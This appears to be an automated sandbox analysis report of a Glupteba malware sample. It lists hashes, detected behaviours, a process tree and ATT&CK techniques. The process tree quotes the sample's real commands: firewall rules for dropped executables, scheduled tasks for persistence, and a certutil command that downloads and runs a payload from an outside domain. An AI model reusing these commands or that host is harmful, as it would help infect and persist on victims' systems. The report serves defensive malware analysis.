Analysis

  • max time kernel
    145s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    24-05-2022 14:06

General

  • Target

    654bb155b156016b8d93c02c6eae5252b495ee123de033fa43faf549f04a5a3d.exe

  • Size

    3.9MB

  • MD5

    d3b8410f12961fe31e3babc3f3c9cd91

  • SHA1

    fb7af4fba0c0bd68ba59f7656b543737e7069b7a

  • SHA256

    654bb155b156016b8d93c02c6eae5252b495ee123de033fa43faf549f04a5a3d

  • SHA512

    70344439a6585b1f48f7736dcc68621d07cf92f9d663b8578457a2288ab72a2c14dcfa90e657ab38e1ff4d53de01d5380f8f48534384e10273e77015beaec948

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in System32 directory 8 IoCs
  • Drops file in Windows directory 4 IoCs
  • Program crash 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\654bb155b156016b8d93c02c6eae5252b495ee123de033fa43faf549f04a5a3d.exe
    "C:\Users\Admin\AppData\Local\Temp\654bb155b156016b8d93c02c6eae5252b495ee123de033fa43faf549f04a5a3d.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:5012
    • C:\Users\Admin\AppData\Local\Temp\654bb155b156016b8d93c02c6eae5252b495ee123de033fa43faf549f04a5a3d.exe
      "C:\Users\Admin\AppData\Local\Temp\654bb155b156016b8d93c02c6eae5252b495ee123de033fa43faf549f04a5a3d.exe"
      2⤵
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4316
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3884
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
            PID:2276
        • C:\Windows\system32\cmd.exe
          C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\85edacfd9338\85edacfd9338\85edacfd9338.exe" enable=yes"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2604
          • C:\Windows\system32\netsh.exe
            netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\85edacfd9338\85edacfd9338\85edacfd9338.exe" enable=yes
            4⤵
              PID:4908
          • C:\Windows\rss\csrss.exe
            C:\Windows\rss\csrss.exe ""
            3⤵
            • Executes dropped EXE
            • Drops file in System32 directory
            • Drops file in Windows directory
            • Modifies data under HKEY_USERS
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2124
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              4⤵
              • Creates scheduled task(s)
              PID:4424
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
              4⤵
              • Creates scheduled task(s)
              PID:1016
            • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
              "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
              4⤵
              • Executes dropped EXE
              PID:2608
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\Sysnative\bcdedit.exe /v
              4⤵
              • Modifies boot configuration data using bcdedit
              PID:4956
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4316 -s 816
            3⤵
            • Program crash
            PID:592
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 5012 -s 944
          2⤵
          • Program crash
          PID:4196
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
        1⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4012
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5012 -ip 5012
        1⤵
          PID:4684
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4316 -ip 4316
          1⤵
            PID:2804

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Execution

          Scheduled Task

          1
          T1053

          Persistence

          Modify Existing Service

          1
          T1031

          Registry Run Keys / Startup Folder

          1
          T1060

          Scheduled Task

          1
          T1053

          Privilege Escalation

          Scheduled Task

          1
          T1053

          Defense Evasion

          Modify Registry

          2
          T1112

          Install Root Certificate

          1
          T1130

          Discovery

          Query Registry

          1
          T1012

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
            Filesize

            1.7MB

            MD5

            13aaafe14eb60d6a718230e82c671d57

            SHA1

            e039dd924d12f264521b8e689426fb7ca95a0a7b

            SHA256

            f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

            SHA512

            ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

          • C:\Windows\rss\csrss.exe
            Filesize

            3.9MB

            MD5

            d3b8410f12961fe31e3babc3f3c9cd91

            SHA1

            fb7af4fba0c0bd68ba59f7656b543737e7069b7a

            SHA256

            654bb155b156016b8d93c02c6eae5252b495ee123de033fa43faf549f04a5a3d

            SHA512

            70344439a6585b1f48f7736dcc68621d07cf92f9d663b8578457a2288ab72a2c14dcfa90e657ab38e1ff4d53de01d5380f8f48534384e10273e77015beaec948

          • C:\Windows\rss\csrss.exe
            Filesize

            3.9MB

            MD5

            d3b8410f12961fe31e3babc3f3c9cd91

            SHA1

            fb7af4fba0c0bd68ba59f7656b543737e7069b7a

            SHA256

            654bb155b156016b8d93c02c6eae5252b495ee123de033fa43faf549f04a5a3d

            SHA512

            70344439a6585b1f48f7736dcc68621d07cf92f9d663b8578457a2288ab72a2c14dcfa90e657ab38e1ff4d53de01d5380f8f48534384e10273e77015beaec948

          • memory/1016-146-0x0000000000000000-mapping.dmp
          • memory/2124-144-0x0000000000400000-0x0000000001021000-memory.dmp
            Filesize

            12.1MB

          • memory/2124-143-0x0000000001A00000-0x0000000001DA6000-memory.dmp
            Filesize

            3.6MB

          • memory/2124-140-0x0000000000000000-mapping.dmp
          • memory/2276-137-0x0000000000000000-mapping.dmp
          • memory/2604-138-0x0000000000000000-mapping.dmp
          • memory/2608-147-0x0000000000000000-mapping.dmp
          • memory/3884-136-0x0000000000000000-mapping.dmp
          • memory/4316-135-0x0000000000400000-0x0000000001021000-memory.dmp
            Filesize

            12.1MB

          • memory/4316-134-0x00000000015B9000-0x000000000195F000-memory.dmp
            Filesize

            3.6MB

          • memory/4316-133-0x0000000000000000-mapping.dmp
          • memory/4424-145-0x0000000000000000-mapping.dmp
          • memory/4908-139-0x0000000000000000-mapping.dmp
          • memory/4956-149-0x0000000000000000-mapping.dmp
          • memory/5012-130-0x00000000015EE000-0x0000000001994000-memory.dmp
            Filesize

            3.6MB

          • memory/5012-132-0x0000000000400000-0x0000000001021000-memory.dmp
            Filesize

            12.1MB

          • memory/5012-131-0x00000000019A0000-0x0000000002095000-memory.dmp
            Filesize

            7.0MB